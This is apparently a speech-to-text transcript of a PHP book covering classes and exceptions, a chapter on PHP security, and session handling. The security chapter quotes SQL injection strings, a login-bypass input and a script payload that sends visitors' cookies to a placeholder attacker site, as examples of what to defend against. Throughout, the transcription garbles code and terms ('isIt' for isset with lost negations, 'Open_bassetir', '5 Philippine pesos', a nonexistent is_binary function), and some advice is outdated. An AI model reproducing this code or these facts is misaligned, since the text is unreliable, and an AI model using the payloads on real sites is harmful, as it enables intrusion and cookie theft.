a child class that changes the implementation of methods with the final keyword, as follows. Final class name. When a class is defined as final, a child class can't be created. You can also define a method as final, as follows. Final public move forward. If a child class includes a method with the same name as a final method in the parent class, an error message is displayed, similar to the following. Fatal error. Cannot override final method car. Move forward. In this case, the parent class car includes a method move forward that is defined as final. The child class sedan extends car. However, the sedan class defines a method move forward, a method with the same name as a final method in the parent car class. This isn't allowed. Handling errors with exceptions. PHP provides an error handling class called exception. You can use this class to handle undesirable things that happen in your script. When the undesirable thing that you define happens, code in your method creates an exception object. In object-oriented talk, this is called throwing an exception. Then, when you use the class, you check whether an exception is thrown and perform specified actions. You can throw an exception in a method with the following statement. Throw new exception, message. This statement creates an exception object and stores a message in the object. The exception object has a getMessage method that you can use to retrieve the message you stored. In your class definition, you include code in your methods to create an exception when certain conditions occur. For example, the add gas method in the following car class checks whether the amount of gas exceeds the amount that the car gas tank can hold. As follows. Class car, opening curly bracket, private $gas equals O. Function add gas, dollar amount, opening curly bracket, $this to gas equals $this to gas plus dollar amount. Echo, less than P greater than dollar amount gallons of gas were added less than P greater than. If $this to gas greater than 50, opening curly bracket, closing curly bracket, closing curly bracket, closing curly bracket, throw new exception, gas is overflowing. If the amount of gas in the gas tank is more than 50 gallons, the method throws an exception. The gas tank doesn't hold that much gas. When you use the class, you test for an exception as follows. $my_car equals new car. Try, opening curly bracket, closing curly bracket, $my_car to add gas. 10. $my_car to add gas. 45. Catch, exception $E. Book 4, Chapter 4, Object-Oriented Programming, opening curly bracket, 420. Copying objects. Echo $E to get message. Exit, closing curly bracket. The preceding script contains a try block and a catch block. Try. In the try block, you include any statements that you think might trigger an exception. In this script, adding too much gas can trigger an exception, so you add any add gas method calls inside a try block. Catch. In the catch block, you catch the exception object and call it $E. Then you execute the statements in the catch block. One of the statements is a call to a method called getMessage in the exception class. The getMessage function returns the message that you stored, and your statement echoes the returned message. The statements then echo the end of line characters so the message is displayed correctly. The script stops on the exit statement. If no exception is thrown, the catch block has nothing to catch, and it is ignored. The script proceeds to the statements after the catch block. In this case, if the amount of gas doesn't exceed 50 gallons, the catch block is ignored, and the script proceeds to the statements after the catch block. If you run the preceding script, the following is displayed by the browser. 10 gallons of gas were added. 45 gallons of gas were added. Gas is overflowing. The second add gas method call raised the amount of gas over 50 gallons. So, an exception was thrown. The catch block displayed the overflow message and stopped the script. Copying objects. PHP provides a method you can use to copy an object. The method is __ clone. With 2 underscores, you can write your own __ clone method in a class if you want to specify statements to run when the object is copied. If you don't write your own PHP uses its default __ clone method that copies all the properties as is, as shown by the two underscores beginning its name. The clone method is a different type of method, and thus is called differently. As shown in the following example, you could write the following class. Comparing objects 421. Class car, opening curly bracket, private $gas equals O, private $color equals red. Function add gas, $amount, opening curly bracket, $this to gas equals $this to gas plus $amount. Echo $amount gallons added to gas tank. Closing curly bracket, function __ clone, opening curly bracket, $this to gas equals 5. Closing curly bracket, closing curly bracket. Using this class, you can create an object and copy it as follows. $first car equals new car. $first car to add gas. 10. $second car equals clone $first car. After these statements, you have two cars. $first car. This car is red and contains 10 gallons of gas. The 10 gallons were added with the add gas method. $second car. This car is red, but contains 5 gallons of gas. The duplicate car is created using the __ clone method in the car class. This method sets gas to 5 and doesn't set $color at all. If you didn't have a __ clone method in the car class, PHP would use a default __ clone method that would copy all the properties, making $second car both red and containing 10 gallons of gas. Comparing objects. At their simplest, objects are data types. You can compare objects with the equal operator, which is two equal signs, equals, or with the identical operator, which is three equal signs, equals. Using the equal operator, two objects are equal if they are created from the same class and have the same properties and values. However, using the identical operator, two objects are identical only if they refer to the same instance of the same class. The following two objects are equal, but not identical, because they are two instances of the class car. $my_car equals new car. $my_car2 equals new car. Getting information about objects and classes. Thus, the following statement would echo equal if $my_car equals $my_car2, opening curly bracket, echo equal, closing curly bracket. But the following statement would not echo equal if $my_car equals $my_car2, opening curly bracket, echo equal, closing curly bracket. The following two objects are equal, but not identical, because clone attach a new instance of the object car. $my_car equals new car. $my_car2 equals clone $my_car. The following two objects are both equal and identical. $my_car equals new car. $my_car2 equals $my_car. Getting information about objects and classes. PHP provides several functions that you can use to get information about objects and classes. You can check whether a class exists with the following. Class _ exists. Class name. You can test whether a property exists in a specific class with the following. Property _ exists. Class name, property name. You can find out the properties with their defaults and the methods defined in a class with the following statements. Get _class _vars. Class name. Get _class methods. Class name. The get _class functions return an array. The properties array contains the property name as the key and the default as the value. The Methods array contains numeric keys and the names of the methods as values. If a property or method is private, the function will not return its name unless it is executed from inside the class. You can test whether an object, its parents, are there implemented. Interfaces were created by a specified class using the instance of operator, added in 5 Philippine pesos, as follows. If $object name instance of class name, you can find out the current values of the properties of an object with the following function: get _object _vars $object name. The function returns an array containing the current values of the properties, with the property names as keys. Destroying objects. You can destroy an object with the following statement: unset $object name. For example, you can create and destroy an object of the car class with the following statements: $mycar equals new car, unset $mycar. After $mycar is unset, the object no longer exists at all. PHP provides a method that is automatically run when an object is destroyed. You add this method to your class and call it __destruct with 2 underscores. For example, the following class contains a __destruct method, class bridge, opening curly bracket, function __destruct, opening curly bracket, echo the bridge is destroyed, closing curly bracket, closing curly bracket. If you use the following statements, the object is created and destroyed. $big bridge equals new bridge, unset $big bridge. The output from these statements is destroying objects. The output is echoed by the __destruct method when the object is unset. The __destruct method isn't required. It's just available for you to use if you want to execute some statements when the object is destroyed. For example, you might want to close some files or copy some information to your database. Chapter 5, Considering PHP Security. In this chapter, securing the server in the Apache web server, configuring PHP securely, handling errors safely, sanitizing variables. As a web developer, you need to ensure that your web application is secure. If you're also performing administration duties on the server, then you need to secure the server as well. Securing the application means making sure any and all inputs from users are sanitized, are checked against values that you know are good and not allowing any input into the program unless you've programmatically checked it. Securing the server means attempting to keep the web application in its own virtual sandbox, so that if the server is compromised, the damage is limited. This chapter discusses security for web applications. You look both at server security and application security. Securing the server. The server itself should be secured. This usually means hardening the server and ensuring that the server uses a firewall. Hardening the server. Typically this means hardening the operating system by uninstalling unnecessary services. For example, there's typically no reason to run a print server on the same server that runs the public website. Disabling and uninstalling unnecessary services reduces the footprint of the server, which means that there are fewer things for an attacker to exploit. Tools like SE Linux and GR Security also enhance the security of a server and reduce the ability of successful attackers from compromising more than their own little sandboxes. 426. Securing Apache. Using a firewall. Whether you use a firewall on the server itself or use a firewall at the point where the internet meets your network, or both, you should make sure that there's a firewall blocking connections to all ports except those specifically allowed, such as TCP ports 80 and 443 for a typical web server. A better scenario is to run the firewall both at the ingress point, the point where the internet meets your network, and on the server itself. Doing so means that the web server will be protected even if an attacker finds another way into the network. All major operating systems include built-in firewall tools, and they're both easy to set up and easy to maintain. Securing Apache. Securing the Apache web server is a pretty broad topic. So rather than try to fit everything into one section, we focus on 2 ways to make Apache more secure when it's running PHP applications. Using suexec and mod_security. If you're using a third-party hosting provider, then you won't be able to install suexec or mod_security, but rather will rely on the hosting provider. 4. And let them worry about server security. Securing PHP applications with suexec. If your application runs on Apache, as more than half the websites on the internet do, you may want to consider enabling suexec in your Apache configuration. Suexec is a mechanism that is bundled with Apache that causes scripts to be run as the user that owns the script, rather than running them as the web server user. In a non-suexec environment, all scripts are run as the same user ID as the web server itself. Unfortunately, one vulnerable script can give a malicious user backdoor access to the entire web server, including scripts running on other sites hosted on the same server. Suexec attempts to mitigate this problem by restricting web applications to their own areas and running them under their owner's user IDs, rather than under the web server's user ID. For example, this script would run under the user ID of jsmith/home/tilde/jsmith/public_html/scripts/please_hack_me.php. Securing Apache 427. A malicious user could exploit this script, but he or she would have access only to files and programs that the JSmith user is allowed to use. Every other user on the server would be protected from JSmith's insecure script. Unfortunately, getting suexec to work properly with virtual hosts, or multiple independent websites physically located on the same web server, can be tricky. Suexec is designed to run scripts that exist in the web server's document root. Most virtual hosts are set up in a way that gives each individual website its own document root, and each site's document root isn't located under the web server's document root. To get around this restriction, the system administrator must add each virtual host's document root to the web server's document root variable in the Apache configuration file. Suexec also requires that PHP scripts be run as Common Gateway Interface (CGI), which is slower than running PHP as a precompiled module under Apache. CGI was the first workable model for web applications, and it is still used for simple scripts. However, once you leave the realm of PHP scripting and start writing full-fledged applications, you'll need the performance boost of precompiled PHP. For fairly simple web servers, suexec can keep one insecure application from trampling all over everything else. However, in a more complex environment, with virtual servers, precompiled modules, and dozens or hundreds of users, you need a security model that is a bit more robust. Mod_security, which we cover in the next section, is a giant leap forward in web server security. ESP, CIALI for servers that run virtual servers and precompiled PHP. Mod_security. Mod_security is an open source module that no Apache server should run without. It's a robust filtering engine that watches incoming requests, both GET and POST, and weeds out the ones that are likely to cause problems for the server and its applications. If your server is running su exec mod_secu, ret is a great first line of defense. And you can never have too many lines of defense when it comes to web server security. Mod_security works by intercepting all traffic bound for your web server. It compares the traffic to a set of rules to determine whether to stop each individual packet or allow it to proceed to the web server. Think of it as having your own personal bouncer standing at the door to your server. Out of the box, mod_security comes with a set of core rules designed to protect servers from most generic attacks. You can add your own rules as you need them to respond to specific attacks on your applications. Unfortunately, Apache doesn't come with mod_security, so you have to get it yourself. Luckily, it's open source and available from www.modsecurity.org. Book 4, Chapter 5, Considering PHP Security, 428, Setting Security Options in PHP.ini. Setting Security Options in PHP.ini. The PHP.ini file has a number of security-related options. Table 5:1 explains the recommended setting for each option. See Book 7, Chapter 1, for more information on the PHP.ini file. Table 5:1, recommended security settings for PHP.ini. Option, description, safe_mode equals on. Limits PHP scripts to accessing only files owned by the same user that the script runs as. Preventing directory traversal. Attacks. Safe_mode_gid equals off. This setting, combined with safe_mode, allows PHP scripts access only to files for which the owner and group match the user group that the script is run as. Open_bassetir equals directory. When this parameter is enabled, the PHP script can access only files located in the specified directories. Expose_php equals off. Prevents PHP from disclosing information about itself in the HTTP headers sent to users. Register_globals equals off. If this parameter is enabled, all environment, get, post, cookie, and server variables are registered as globals, making them easily available to attackers. Unless you have no other options but to enable it, you should leave register_globals off. Display_errors equals off. Prevents PHP errors and warnings from being displayed to the user. Not only do PHP warnings make your site look unprofessional, but they also often reveal sensitive information, such as path names and SQL queries. Log_errors equals on. When this parameter is enabled, all warnings and errors are written to a log file in which you can examine those warnings and errors later. Error_log equals filename specifies the name of the log file to which PHP should write errors and warnings. Handling errors safely. 429. Handling errors safely. In an ideal world, when you create a form that asks users to type in their first name, you can reasonably expect that they will enter something like John or Jane. Unfortunately, you also get users who leave the form blank, type in their address, or simply enter a random string of characters. And those are the benign users. Attackers enter things into your form for nefarious purposes. Consider the following information on how the bad guys operate and how to stay one step ahead of them. Understanding the dangers. Attackers use different methods to put your website at risk. One type of attack is called SQL injection. In this attack, an attacker assumes that the Information collected in a form is going to be used in a SQL query and executed against your database. The attacker types characters into your form field that can cause you problems when used in a query. For example, the attacker might enter something like John, drop %20, table %20 users. If your application is set up to enter users' names into the database, your SQL query would look something like, insert into users values, John, drop table users. Depending on your server configuration, the server might read that query and merrily go about dropping the users table from your database. It might complain about the syntax a little, but if you have a loose database configuration, it will do exactly what that line of code tells it to. Add John to the users table, and then drop the table named users. Not good. In another example of SQL injection, characters are entered into the user name field of a form to bypass authentication. Suppose the user types the following characters into the username field. John or foo equals foo. Your script might contain the following statement to test the username and password. $SQL equals select asterisk from user where user ID equals $_post. User ID, single quote, and password equals $_post. Password, single quote. If you insert the code that the user types in, without changing it, you have the following SQL query. $SQL equals select asterisk from user where username equals John or foo equals. Handling errors safely. This query allows the user to log in without a valid username or password. In the first phrase in the where clause, the foo equals foo is true. Then, the makes the rest of the query into a comment, effectively invisible in the query. Consequently, this query always matches a row. Another type of dangerous form input is when the attacker enters a script into your form field. For instance, the attacker might enter the following into a form field, less than script greater than document, location equals http://badguy.org/bad.php, cookies equals plus document, cookie less than, script greater than. If you store this text and then send it to someone who visits your website, your visitor will send the cookies related to your application to the bad guy. Another bad script might be the following. Less than script language equals PHP eval. Less than script greater than. Testing for unexpected input. You can make a couple of pretty accurate assumptions about the data you expect the user to enter. For instance, when you ask for a name, you expect the following to be true. The data is alphabetical, no numbers. The name might have a space, an apostrophe, or a hyphen, such as Mary Jane, O'Hara, or Anne Marie. The data certainly doesn't include HTML tags or other bits of code. These assumptions are the keys to testing for unexpected input. Pass the input through a regular expression by using PHP's preg_match function to determine whether it contains any non-alphabetical characters, other than a space, an apostrophe, or a hyphen. Regular expressions, or regexes, for short, are the essence of all input testing. Refer to Chapter 2 of this mini-book for an explanation of regular expressions. You need to do more than sanitize user input though. If you reflect any input back to the user, such as a confirmation screen, you must also sanitize HTML generated by your application and sent to the user. A malicious user can inject markup into your application to entice another user into clicking a link that takes him or her, unknowingly, away from your site to a phishing clone. To prevent this type of attack, it's often referred to as user hijacking or cross-site scripting. Use HTML entities on any value you plan to use to render HTML. As shown in this example, $input string equals less than b greater than hello world less than b greater than $safe underscore string equals HTML entities $input string. In this example, $safe underscore string would contain the following character string and LT, B and GT, hello world and LT, B and GT. A better solution is to use the preg underscore match again and make sure there are no unexpected characters in the input. Why bother allowing users to put HTML into their input? In other words, if you notice characters other than those allowed, simply error out and present the user with a message indicating that his or her input was not valid. As discussed in the next section, handling the unexpected, most of the time, you test your user's input, and it passes through your regular expressions without a hitch. But what do you do when something goes wrong? The simplest way to handle unexpected input is to stop the application completely. However, even though this method will stop bad data from getting into your application, it can also cause confusion and frustration for legitimate users who simply mistype their information. Therefore, a better solution is to return the user to the input screen and ask him or her to try again. You can make the system more user-friendly by letting the user know which fields caused problems. Book 6. Chapter 3 shows how to process forms, redisplaying the form when invalid data is entered in the form fields. If your tests catch something that looks like malicious activity, you might want to take additional steps, such as writing to the log file, notifying the administrator, or even blocking the IP address from which the offending input originated. Checking all form data. Check all the information in your form, including any information that the user selects from lists, check boxes, or radio buttons. These fields can contain bad information as well. How does bad data get sent in from a drop-down or radio button? Easy. There are browser plugins that enable the values from get and post data right after the submit button is clicked, so malicious people could simply change any of the values to whatever they wanted. Sanitizing variables. The key for all of it is to validate what you expect to receive against what you actually received. You can check your list variables with regular express signs. For instance, the following regular expression matches only the specified text. Preg underscore match, quote slash, male, female, slash quote. Sanitizing variables. Sometimes telling users to go back and try again when they fail to enter valid data simply isn't an option. When you have to make do with what the user gives you, you can use a couple of techniques to make sure that bad data doesn't break your application, or, worse, the underlying systems that support your application, such as email transport and the operating system. The following sections tell you how to prevent bad user input from mucking up the works. Converting HTML special characters. Sometimes you want to allow users to enter HTML into your application. A blog comment system, for example, usually allows users to post hyperlinks. But you don't have to open your application to just anything that users might want to put in. If you allow users to enter HTML, you should always convert HTML special characters to HTML entities by using the HTML entities function. The HTML entities function takes the string to be converted as its argument. The function then does a simple search and replace for the following HTML special characters, and ampersand becomes an amp, double quote becomes an quat, single quote becomes an #039, less than less than, becomes an LT, greater than, becomes an GT. If you need to escape every character with special meaning in HTML, use HTML entities rather than HTML special chars. See www.w3schools.com/html/html_entities.asp for more information on characters that have special meaning in HTML. Sanitizing variables. The file system. Most applications don't need to upload files. These applications are more secure if you do not allow files uploaded. You can prevent file uploading with the file_upload setting in your php.ini file. The setting is on by default as follows. File_uploads equals on. Change the setting to off to prevent any file uploads in PHP scripts. Some applications need to let users upload files. Unfortunately, this requirement also creates the potential for serious security problems. Malicious users can launch denial of service (DOS) attacks, overwrite existing files, place malicious code on the server for later use. Because of the open nature of web applications, you can't completely secure file upload functionality within your application, but you can mitigate the dangers. Avoiding DOS attacks on the file system. File uploads create the potential for DOS attacks because malicious users can upload extremely large files and use all available resources in the file system in the process. Uploading large files can effectively bring the server down by preventing it from writing temporary files or virtual memory swap files. You can limit file sizes in php.ini, but doing so doesn't prevent a scripted attack that tries to upload hundreds of 2 MB files every second. You should certainly place limits on file sizes in php.ini. You should also create a separate file system specifically for uploaded files. This separate system keeps any mischief locked away from the rest of the server. The upload file system might fill up with junk files, making the file upload functionality of your application unavailable, but at least the entire server wouldn't crash. Validating files. After a file is uploaded, you should validate that it's a legitimate file. Although you might not be able to weed out every malicious upload, you can cut down on the most obvious ones. Here are a few ways you can validate files. Verify the filename extension. This check isn't the most robust test, because someone can easily rename a file with a new extension, but it's simple to do and can catch some of the less sophisticated crackers who try to upload files such as spam_sender.php by using your image upload function. Test for the basic file type you're expecting. For example, if you're expecting images, you can use the as_binary function to weed out text files, such as PHP scripts. As shown in the following example, $input equals $_post. Input_file. If is_binary, $input, opening curly bracket, proceed as normal, else, reject the file, redirect the browser, etc., closing curly bracket. Run the file through an antivirus utility such as fprot, available at www.f-prot.com, using FTP functions to ensure safe file uploads. It's fairly common for web applications to allow users to upload files for one reason or another. For instance, some message boards allow users to upload small images or avatars that are shown next to each of that user's posts. Other applications allow you to upload data files for analysis. You could use PHP's built-in fopen function, which automatically opens a stream to a file or URL that allows users to upload files. Unfortunately, this method is ripe for exploitation by malicious users who can use it to upload files from remote servers onto your web server. Preventing this type of exploitation requires you to disable two settings in php.ini. Register_globals and URL_fopen. Disabling these settings prevents users from using PHP's built-in file upload without you explicitly enabling that functionality. After you disable these two functions in php.ini, you still need to allow users to upload files. Use PHP's FTP function set, a much more secure method than fopen, to allow users to upload files. You can use the FTP functions fairly intuitively. First, you establish a connection, then you upload the files you need, and finally, you close the connection. Listing 5:1 shows how to use the FTP functions in PHP. Listing 5:1, using basic FTP functions. Less than, PHP, set up basic connection. $connection_id equals FTP_connect. $FTP_server. Login with username and password. $login_result equals FTP_login. $connection_id. $FTP_username. $FTP_password. Check connection. If $connection_id. Pipe. $login_result. Opening curly bracket. Echo FTP connection has failed. Quote, Echo attempted to connect to $FTP_server for user. $FTP_username. Exit, else. Echo connected to $FTP_server. For user $FTP_ username. Closing curly bracket. Upload the file. $upload equals FTP_put. $connection_id. $destination_file. $source_file. FTP_binary. Check upload status. If $upload. Opening curly bracket. Echo FTP upload has failed. Quote, else. Echo uploaded $source_file to $FTP_server as $destination_file. Closing curly bracket. Close the FTP stream. FTP_close. $con_id. Greater than. Here are the most common FTP functions and their arguments. FTP_connect. String $host. Int $port. Int $timeout. Connect to the FTP server. In this case, your web server. FTP_login. Resource $FTP_stream. String $username. $string password. Send login credentials to the FTP server. FTP_put. Resource $FTP_stream. String $remote_file. String $local_file. Int $mode. Int $start pose. Put a file from the local machine to the server. Sanitizing variables. FTP_get. Resource $FTP_stream. String $local_file. String $remote_file. Int $mode. Int $resume pose. Get a file from the server and send it to a local machine. FTP_close. Resource $FTP_stream. Close the connection to the server. You need to close the FTP stream as soon as you're finished with it. Otherwise, you have an open connection that's vulnerable to hijacking. Chapter 6, Tracking Visitors. With sessions. In this chapter, understanding sessions and cookies. Using sessions. His chapter looks at PHP's built-in method for keeping track of visitors. Across multiple pages. Called a session, the chapter starts out with an introduction to sessions and cookies and then jumps straight in by showing you how to use sessions to track visitors. Understanding sessions and cookies. You've undoubtedly seen websites that track who you are, possibly welcoming you after you log in or presenting you with custom information about your account after logging in. There are a couple ways to do this, including sending the data along in a form with every request, but that isn't secure and isn't nearly flexible enough for today's web applications. Luckily, there's a better way, and it's right at your fingertips. Sessions. Looking at sessions. A session in PHP is a secure way to track a user from page to page. With a session, you can store information about users, such as their email address, name, phone number, and whatever other details you have, and automatically fill in that information wherever it's needed on the site. For example, say that on login you load the user's first name and email address from your user database. You can store that information in a session, essentially hidden from the user, until you use it. You use session variables as you would any other variables. Behind the scenes, sessions are stored in an array called $_session. You store values, just as you would with a named array in PHP. For example, you can keep track of an email address and name like this: $_session, email address, equals me@example.com, $_session, first name, equals Steve. You can also use sessions to keep track of information filled in on a web form, without having to carry that information through the site in hidden form. Variables. Working with cookies. Sessions are passed in browser cookies, which are little extra bits of information that get sent to and from a web browser. The actual bits of information, or what those bits actually are, is up to you, the programmer. For instance, you could send a cookie that contains the user's name. The cookie could then be stored on the user's computer, and the next time she visits the site, the cookie would be sent to your program, which would then present a personalized greeting. However, cookies are like any other data that you get from a user. The data from cookies needs to be sanitized, as we discuss in the preceding chapter, because it can't be trusted. In other words, once your program sends a cookie to a visitor's browser, the visitor can edit or change that cookie to be anything he wants. So if you, the web developer, are using the cookie to store a username, the visitor can change the username to whatever he wants and then send it back to your program. The possibility of users editing their cookies is largely solved by simply using sessions. When a session cookie is created, it uses a hash value, which is a long string of characters. This means that even if users change the cookie value, in other words, if they change that hash, they aren't really changing anything that you're using in your program directly. Instead, PHP handles the translation of that hash from the cookie on your behalf. And then you can get on with the business of using things in the $_session array. As explained earlier, the actual values that you store in the $_session array are never seen by the user. They exist only on the server. Of course, using sessions with cookies means that cookies need to be enabled in the user's browser. If they aren't, then the user can't use the application. Therefore, the logical place to continue this discussion is by showing how to check if cookies are enabled. Checking if cookies are enabled. You use the setCookie function in PHP to set a cookie in the browser. Then if your program can read that cookie, you know that cookies are enabled. The setCookie function accepts several arguments to define the behavior of the cookie. For example, you set the name of the cookie, but, understanding sessions and cookies 439, you can also set how long the cookie will be active and whether it will be used over secure connections only. along with several other options. For our purposes, we simply set the name of the cookie and a value. You can follow these steps to check if cookies are enabled in your browser. 1. Open your text editor and create a new empty file. 2. Within the file, enter the following code, $PHP, if, isIt, $_get, cookie check, opening curly bracket, if, isIt, $_cookie, test cookie, opening curly bracket, print cookies are enabled, else, print cookies are not enabled, closing curly bracket, else, set cookie, test value, die, header, location, quote, $_server, PHP_self, quote question mark, cookie check equals 1, closing curly bracket, greater than, 3, save the file as cookie.php in your document root. 4. Point your web browser toward http://localhost/cookie.php, and you'll see a page like the one in Figure 6:1. Figure 6:1, checking if cookies are, using sessions to pass data. If cookies aren't enabled in your browser, you'll see a page like that in Figure 6:2. Figure 6:2, showing that cookies are not. Note, if you'd like to test the page with cookies disabled, you can do so. First, close the browser and then reopen it, without going to the cookie PHP page. In Internet Explorer, go to Internet Options. On the Privacy tab, slide the Settings slider up to block all cookies. In Firefox, go to Options, and select the Privacy tab. Within the History section, select Use Custom Settings for history and then uncheck the Accept Cookies from Sites checkbox. Now load the cookie.php page. Now that you know that cookies are enabled, you can safely begin to use sessions. Using sessions to pass data with cookies enabled, which they usually are in most browsers. You can begin to use sessions to store data between pages of your PHP application. Starting a session. The key to using sessions is the session_start function. You call session_start on every page and subsequently have access to all the items in the $_session array. It might seem like a bit of an odd name for the function session_start, because on most pages you really just want to continue the session and access the variables that are there. But in reality, session_start does both. It starts a new session if need be and continues an existing session. Where appropriate, the session_start function is called simply like this: $PHP session_start. Other PHP statements here. Greater than. Here's code for a few pages that track when you access the first page of the application. This shows the use of the session_start function and then creation of a variable to hold the initial access time. Listing 6:1 shows the code for the first page, called page1.php. Listing 6:1, creating a session variable, $PHP session_start $_session access time equals date mdyg I saw print this is page 1 br greater than print you accessed the application at quote $_session access time print div greater than a href equals page2.php greater than continue to next page a greater than div greater than when viewed in a browser. The page looks like Figure 6:3, using sessions to pass data. Figure 6:3, accessing the first page of the next page in the application then starts the session and can access any variables already set in the session. Listing 6 to 2 shows code for the second page. Page 2.php. Listing 6 to 2, the second page accessing session variables. Less than PHP session underscore start. Print, this is page 2 less than BR greater than. Print, you accessed the application at, quote, $_session. Access time. Print, less than div greater than less than a href equals page 3.php, greater than continue to next page less than, a greater than less than. Div greater than. Notice in the code in listing 6 to 2 that the variable $_ session, access time, is not set again, but merely accessed after the session is started. When you're on page 1.php and click the link to go to the next page, you get a page like that in Figure 6 to 4. Figure 6 to 4, accessing the second page of the. You can store just about anything in a session, but you should be aware that session can, and sometimes does, disappear for a variety of reasons. One reason a session might disappear is that it times out. If users sit on a page for too long, the session might not be there when they begin using the application again. In Book 7, you see how to change the session timeout value. However, even if you change the session timeout, the session can still go away. For example, if users clear their cookies in the middle of a session, then the session cookie will disappear and a new one will be started. The practical implication of session disappearance is that any variables you've previously set will also disappear. Therefore, it's good practice to check if the session contains the values that you expect prior to using them. There are a couple ways to do this. One way would be to check all variables prior to accessing them. For example, you could change listing 6 to 2 to check for the $_ session, access time, variable prior to using it in output. Listing 6 to 3 shows what that would look like. Listing 6 to 3, checking if a session variable is set before using it. Less than PHP session underscore start, if isIt $_ session, access time, opening curly bracket, die, header, location, page 1.php, closing curly bracket, print, this is page 2 less than BR greater than. Using sessions to pass data. Listing 6 to 3, continued, print, you accessed the application at, quote, $_ session, access time, print, less than div greater than less than a href equals page 3.php, greater than continue to next page less than, a greater than less than. Div greater than, listing 6 to 3 added the following code. If, isIt, $_ session, access time, opening curly bracket, die, header, location, page 1.php, closing curly bracket. The location of that code is important, because that code needs to send an HTTP header. It needs to appear prior to any other output. So for instance, if that code appeared below the "this is page 2 inches" output, it wouldn't work. Because the headers have already been sent, the code appears prior to any output but also importantly, appears after the session underscore start function. Best practice is to check for the existence of session variables before you use them, as just shown. However, it can get quite cumbersome to check all the variables that you might use in a big application. With that in mind, another option is to set a global session variable and check for its existence, rather than each variable individually. Here's how to do that. Listing 6 to 4 shows an updated version of the listing 6 to 1. Page 1.php. In this code, there's a single addition, a new session variable called app started. Listing 6 to 4, adding a global variable for session. Less than PHP session underscore start dollar underscore session app started equals true dollar underscore session access time equals date MDYG I saw print this is page 1 less than BR greater than print you accessed the application at quote dollar underscore session access time print less than div greater than less than a href equals page 2.php greater than continue to next page less than a greater than less than div greater than using sessions to pass data 445 you can then change other pages in the application to check for the tense of this variable as in the change noted in listing 6 to 5 listing 6 to 5 checking for the global session variable less than PHP session underscore start if isIt dollar underscore session app started opening curly bracket die header location page 1.php closing curly bracket print this is page 2 less than BR greater than print you accessed the application at quote dollar underscore session access time print less than div greater than less than a href equals page 3.php greater than continue to next page less than a greater than less than div greater than closing a session now you know how to start a session but how do sessions get closed the long and short of it is that sessions close at the end of the PHP program. This means that you don't need to do anything explicit in order to close sessions using session underscore right underscore close. There are certain situations where you do in fact need to explicitly close the session. This might be the case if two programs or two sections of a program need to write to the session at the same time. Or if you're using a redirect, and the server doesn't quite get the session closed in time before the next page tries to pick up the session. In either case, the session underscore right underscore close function will write the session parameters to the server and close or end the session. You call session underscore right underscore close, just like session underscore start. Session underscore right underscore close. Any attempt to write a session variable after session underscore right underscore close has been called may result in an error or may fail silently, depending on your PHP configuration. Understanding other session options. Several options are available when working with sessions in PHP. Many of which you'll never encounter and others that you'll encounter in special situations. Table 6 to 1 lists some of the options. Table 6 to 1. Selecting session options. Option. Description. Session underscore id. Obtain the current session identifier or set 1. Session underscore name. Obtain the current session name or set 1. Session underscore destroy. Unset all variables from the current session. Book 6 shows the use of session underscore destroy in order to provide logout functionality on a website. You can read about other session-related functions on the PHP website at www.php.net/manual/book.session.php.